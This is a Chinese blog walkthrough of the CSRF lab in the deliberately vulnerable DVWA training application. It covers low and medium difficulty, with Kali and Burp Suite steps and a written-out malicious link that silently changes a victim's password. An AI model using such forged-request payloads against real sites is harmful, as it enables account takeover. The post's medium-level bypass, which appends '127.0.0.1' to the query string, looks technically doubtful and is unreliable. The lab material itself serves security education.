DVWA-CSRF

1 篇文章 0 订阅

DVWA-CSRF(跨站请求伪造攻击)

开始前先查看要进行被csrf漏洞注入的客户机的IP
在这里插入图片描述

如图为10.212.63.93

low
用kali进行攻击,打开kali终端
netstat -ntulp | grep 80 //查看所有80端口使用情况
service apache2 start //启动阿帕奇
在这里插入图片描述

打开阿帕奇后在浏览器URL栏中输入被攻击客户端的IP可进入DVWA
在这里插入图片描述

将被攻击端和攻击端都调到low,在CSRF修改密码栏中输入自己想进行攻击修改的密码,进行burpsuite抓包,复制DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change
关闭浏览器代理放包
在这里插入图片描述

再次打开终端输入ifconfig查看IP为192.168.75.131,输入gedit 1.html创建一个1.html文件,在文件内写入
<a href='http://192.168.75.131/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change'>csrf</a>在1.html下创建一个超链接
回到浏览器在URL栏中输入192.168.75.131/1.html,可以看到链接csrf,点进去重进进入DVWA,这时以改过密码
在这里插入图片描述

Medium
查看源代码
在这里插入图片描述

多了if判断,对本机服务进行了判断,只接受本机地址,绕过只需在链接中添加127.0.0.1

<a href='http://192.168.75.131/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change127.0.0.1'>csrf</a>

其余步骤与上面均相同

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值